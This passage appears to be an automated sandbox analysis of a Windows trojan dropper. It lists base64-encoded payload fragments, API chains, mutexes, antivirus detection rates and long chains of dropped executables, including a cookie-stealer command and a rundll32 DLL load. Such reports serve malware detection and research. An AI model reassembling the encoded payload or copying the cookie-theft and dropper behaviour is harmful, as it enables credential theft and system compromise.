UFBQkpkRGVBQUFFS0JRQUFBcHpGUUFBQ3FJbEdCMk5SZ0FBQVNYUTR3QUFCQ2dVQUFBS2N4VUFBQXFpS01ZQUFBWnZGZ0FBQ2d3NElnSUFBQklDS0JjQUFBb05jN2NCQUFZVEJIUHdBQUFHRXdVUkJINFlBQUFLZlFVQkFBUitHQUFBQ2hNR0VRUUpjeGtBQUFvb0dnQUFDbThiQUFBS2ZRVUJBQVFSQkhzRkFRQUVIdytOUmdBQUFTWFE3Z0FBQkNnVUFBQUtjeFVBQUFwdkhBQUFDaXdhSG8xR0FBQUJKZERaQUFBRUtCUUFBQXB6RlFBQUNoTUdLMDhKSHo2TlJnQUFBU1hRcGdBQUJDZ1VBQUFLY3hVQUFBcHlBUUFBY0g0WUFBQUtLQjBBQUFvb0hnQUFDbThjQUFBS0xRNFJCSHNGQVFBRUtNa0FBQVlyREJFRWV3VUJBQVFveUFBQUJoTUdFUVlvSHdBQUNqb3lBUUFBRVFZV2J5QUFBQW9UQ0JJSUtDRUFBQXB2SWdBQUNoRUdGaGR2SXdBQUNpZ2tBQUFLRXdZUkJIc0ZBUUFFS01jQUFBWVRCeEVIS0I4QUFBbzY4Z0FBQUJFRkVRWnY1QUFBQmhFRkVRZHY1Z0FBQmhFRkVRVCtCcmdCQUFaekpRQUFDbjRJQVFBRUpTMFhKbjRHQVFBRS9nYS9BUUFHY3lZQUFBb2xnQWdCQUFRb0FnQUFLMi9vQUFBR0VRVVJCUDRHdVFFQUJuTW5BQUFLZmdrQkFBUWxMUmNtZmdZQkFBVCtCc0FCQUFaektBQUFDaVdBQ1FFQ
      Source: 6.2.YX7wpjoMI0vZoMwVbFh9XNIC.exe.bf0000.0.unpack, SystemSecurityCryptographyCAPIBaseCMSGCMSRECIPIENTINFO30299.csBase64 encoded string: 'VNetWebRequest77765FZxUUFBTUFBQUFFQUFBQS8vOEFBTGdBQUFBQUFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFnQUFBQUE0ZnVnNEF0QW5OSWJnQlRNMGhWR2hwY3lCd2NtOW5jbUZ0SUdOaGJtNXZkQ0JpWlNCeWRXNGdhVzRnUkU5VElHMXZaR1V1RFEwS0pBQUFBQUFBQUFCUVJRQUFUQUVEQU0zc3lLZ0FBQUFBQUFBQUFPQUFBZ0VMQVRBQUFHd0JBQUFNQUFBQUFBQUFNbjRCQUFBZ0FBQUFvQUVBQUFCQUFBQWdBQUFBQkFBQUJBQUFBQUFBQUFBRUFBQUFBQUFBQUFEZ0FRQUFCQUFBQUFBQUFBSUFRSVVBQUJBQUFCQUFBQUFBRUFBQUVBQUFBQUFBQUJBQUFBQUFBQUFBQUFBQUFPQjlBUUJQQUFBQUFLQUJBTlFFQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU1BQkFBd0FBQURFZlFFQUhBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUlBQUFDQUFBQUFBQUFBQUFBQUFBQ0NBQUFFZ0FBQUFBQUFBQUFBQUFBQzUwWlhoMEFBQUE2R3NCQUFBZ0FBQUFiQUVBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQ0FBQUdBdWNuTnlZd0FBQU5RRUFBQUFvQUVBQUFnQUFBQndBUUFBQUFBQUFBQUFBQUFBQUFCQUFBQkFMbkpsYkc5akFBQU1BQUFBQU1BQkFBQUVBQUFBZUFFQUFBQUFBQUFBQUFBQUFBQUFRQUFBUWdBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQlIrQVFBQUFBQUFTQUFBQUFJQUJRQ2NvZ0FBS05zQUFBTUFBQUF6QUFBR0FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFHekFKQVB3Q0FBQUJBQUFSY3c4QUFBb0tBbjRIQVFBRUpTMFhKbjRHQVFBRS9nYStBUUFHY3hBQUFBb2xnQWNCQUFRb0FRQUFLMjhTQUFBS0N6aW9BZ0FBQjI4VEFBQUtGeGNaalVVQUFBRWxGaDhLalVZQUFBRWwwT1lBQUFRb0ZBQUFDbk1WQUFBS29pVVhIbzFHQUFBQkpkRGVBQUFFS0JRQUFBcHpGUUFBQ3FJbEdCMk5SZ0FBQVNYUTR3QUFCQ2dVQUFBS2N4VUFBQXFpS01ZQUFBWnZGZ0FBQ2d3NElnSUFBQklDS0JjQUFBb05jN2NCQUFZVEJIUHdBQUFHRXdVUkJINFlBQUFLZlFVQkFBUitHQUFBQ2hNR0VRUUpjeGtBQUFvb0dnQUFDbThiQUFBS2ZRVUJBQVFSQkhzRkFRQUVIdytOUmdBQUFTWFE3Z0FBQkNnVUFBQUtjeFVBQUFwdkhBQUFDaXdhSG8xR0FBQUJKZERaQUFBRUtCUUFBQXB6RlFBQUNoTUdLMDhKSHo2TlJnQUFBU1hRcGdBQUJDZ1VBQUFLY3hVQUFBcHlBUUFBY0g0WUFBQUtLQjBBQUFvb0hnQUFDbThjQUFBS0xRNFJCSHNGQVFBRUtNa0FBQVlyREJFRWV3VUJBQVFveUFBQUJoTUdFUVlvSHdBQUNqb3lBUUFBRVFZV2J5QUFBQW9UQ0JJSUtDRUFBQXB2SWdBQUNoRUdGaGR2SXdBQUNpZ2tBQUFLRXdZUkJIc0ZBUUFFS01jQUFBWVRCeEVIS0I4QUFBbzY4Z0FBQUJFRkVRWnY1QUFBQmhFRkVRZHY1Z0FBQmhFRkVRVCtCcmdCQUFaekpRQUFDbjRJQVFBRUpTMFhKbjRHQVFBRS9nYS9BUUFHY3lZQUFBb2xnQWdCQUFRb0FnQUFLMi9vQUFBR0VRVVJCUDRHdVFFQUJuTW5BQUFLZmdrQkFBUWxMUmNtZmdZQkFBVCtCc0FCQUFaektBQUFDaVdBQ1FFQ
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@68/339@28/18
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exeFile created: C:\Program Files (x86)\Company
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUUJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:64:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6252:120:WilError_01
      Source: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exeMutant created: \Sessions\1\BaseNamedObjects\37238328-1324242-5456786-8fdff0-67547552436675
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6064:120:WilError_01
      Source: C:\Users\user\Documents\Xl5_fidIgZFRU48uwkdfjZGj.exeFile created: C:\Users\user\AppData\Local\Temp\axhub.dllJump to behavior
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCommand line argument: 08A
      Source: yevbZfdCqR.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exeSystem information queried: HandleInformation
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Documents\LPBuRcBvc7urPUzoi5RqTFtn.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Documents\LPBuRcBvc7urPUzoi5RqTFtn.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Documents\BqbASL8ovE3o_gRiKrvwENXN.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Documents\BqbASL8ovE3o_gRiKrvwENXN.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Documents\BqbASL8ovE3o_gRiKrvwENXN.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Program Files (x86)\Company\NewProduct\jooyu.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Program Files (x86)\Company\NewProduct\jooyu.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Program Files (x86)\Browzar\Browzar.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Program Files (x86)\Browzar\Browzar.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Program Files (x86)\Browzar\Browzar.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Documents\Xl5_fidIgZFRU48uwkdfjZGj.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rUNdlL32.eXe' 'C:\Users\user\AppData\Local\Temp\axhub.dll',axhub
      Source: ZteJ0k9a2sM9jXcC3SndaipD.exe, oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.962502810.0000000000400000.00000040.00020000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
      Source: ZteJ0k9a2sM9jXcC3SndaipD.exe, oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.962502810.0000000000400000.00000040.00020000.sdmp, jfiag3g_gg.exe, 00000017.00000002.728626975.0000000000401000.00000040.00020000.sdmp, md8_8eus.exe, 00000023.00000002.964153694.00000000004D9000.00000002.00020000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
      Source: ZteJ0k9a2sM9jXcC3SndaipD.exe, oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.962502810.0000000000400000.00000040.00020000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
      Source: ZteJ0k9a2sM9jXcC3SndaipD.exe, oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.962502810.0000000000400000.00000040.00020000.sdmp, md8_8eus.exe, 00000023.00000002.964153694.00000000004D9000.00000002.00020000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
      Source: ZteJ0k9a2sM9jXcC3SndaipD.exe, oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.962502810.0000000000400000.00000040.00020000.sdmp, md8_8eus.exe, 00000023.00000002.964153694.00000000004D9000.00000002.00020000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
      Source: ZteJ0k9a2sM9jXcC3SndaipD.exe, 00000005.00000002.965244604.0000000000400000.00000040.00020000.sdmp, oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.962502810.0000000000400000.00000040.00020000.sdmp, md8_8eus.exe, 00000023.00000002.964153694.00000000004D9000.00000002.00020000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
      Source: ZteJ0k9a2sM9jXcC3SndaipD.exe, oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.962502810.0000000000400000.00000040.00020000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
      Source: yevbZfdCqR.exeVirustotal: Detection: 67%
      Source: yevbZfdCqR.exeMetadefender: Detection: 25%
      Source: yevbZfdCqR.exeReversingLabs: Detection: 68%
      Source: unknownProcess created: C:\Users\user\Desktop\yevbZfdCqR.exe 'C:\Users\user\Desktop\yevbZfdCqR.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exe 'C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe 'C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe 'C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe 'C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exe 'C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exe 'C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\Xl5_fidIgZFRU48uwkdfjZGj.exe 'C:\Users\user\Documents\Xl5_fidIgZFRU48uwkdfjZGj.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe 'C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exe 'C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\LPBuRcBvc7urPUzoi5RqTFtn.exe 'C:\Users\user\Documents\LPBuRcBvc7urPUzoi5RqTFtn.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe 'C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe'
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\BqbASL8ovE3o_gRiKrvwENXN.exe 'C:\Users\user\Documents\BqbASL8ovE3o_gRiKrvwENXN.exe'
      Source: C:\Users\user\Documents\Xl5_fidIgZFRU48uwkdfjZGj.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exe 'C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\KyTQCmNmjazMZrvIWzjrSsQG.exe 'C:\Users\user\Documents\KyTQCmNmjazMZrvIWzjrSsQG.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe 'C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe'
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeProcess created: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe
      Source: C:\Users\user\Documents\LPBuRcBvc7urPUzoi5RqTFtn.exeProcess created: C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\user\AppData\Local\Temp\fj4ghga23_fsa.txt
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exeProcess created: C:\Program Files (x86)\Company\NewProduct\file4.exe 'C:\Program Files (x86)\Company\NewProduct\file4.exe'
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exeProcess created: C:\Program Files (x86)\Company\NewProduct\jooyu.exe 'C:\Program Files (x86)\Company\NewProduct\jooyu.exe'
      Source: C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exeProcess created: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exe 'C:\Program Files (x86)\Browzar\NVdpapR9v21C.exe'
      Source: C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exeProcess created: C:\Program Files (x86)\Browzar\Browzar.exe 'C:\Program Files (x86)\Browzar\Browzar.exe'
      Source: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exeProcess created: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe 'C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe'
      Source: C:\Users\user\Documents\Xl5_fidIgZFRU48uwkdfjZGj.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rUNdlL32.eXe' 'C:\Users\user\AppData\Local\Temp\axhub.dll',axhub
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exeProcess created: C:\Program Files (x86)\Company\NewProduct\jingzhang.exe 'C:\Program Files (x86)\Company\NewProduct\jingzhang.exe'
      Source: C:\Users\user\Documents\LPBuRcBvc7urPUzoi5RqTFtn.exeProcess created: C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\user\AppData\Local\Temp\fj4ghga23_fsa.txt
      Source: C:\Program Files (x86)\Company\NewProduct\jingzhang.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exeProcess created: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe 'C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe'
      Source: C:\Program Files (x86)\Company\NewProduct\jooyu.exeProcess created: C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\user\AppData\Local\Temp\fj4ghga23_fsa.txt
      Source: C:\Program Files (x86)\Company\NewProduct\jooyu.exeProcess created: C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\user\AppData\Local\Temp\fj4ghga23_fsa.txt
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exe 'C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe 'C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe 'C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe 'C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exe 'C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exe 'C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\Xl5_fidIgZFRU48uwkdfjZGj.exe 'C:\Users\user\Documents\Xl5_fidIgZFRU48uwkdfjZGj.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe 'C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exe 'C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\LPBuRcBvc7urPUzoi5RqTFtn.exe 'C:\Users\user\Documents\LPBuRcBvc7urPUzoi5RqTFtn.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe 'C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\BqbASL8ovE3o_gRiKrvwENXN.exe 'C:\Users\user\Documents\BqbASL8ovE3o_gRiKrvwENXN.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exe 'C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\KyTQCmNmjazMZrvIWzjrSsQG.exe 'C:\Users\user\Documents\KyTQCmNmjazMZrvIWzjrSsQG.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe 'C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe'
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeProcess created: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe
      Source: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exeProcess created: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe 'C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe'
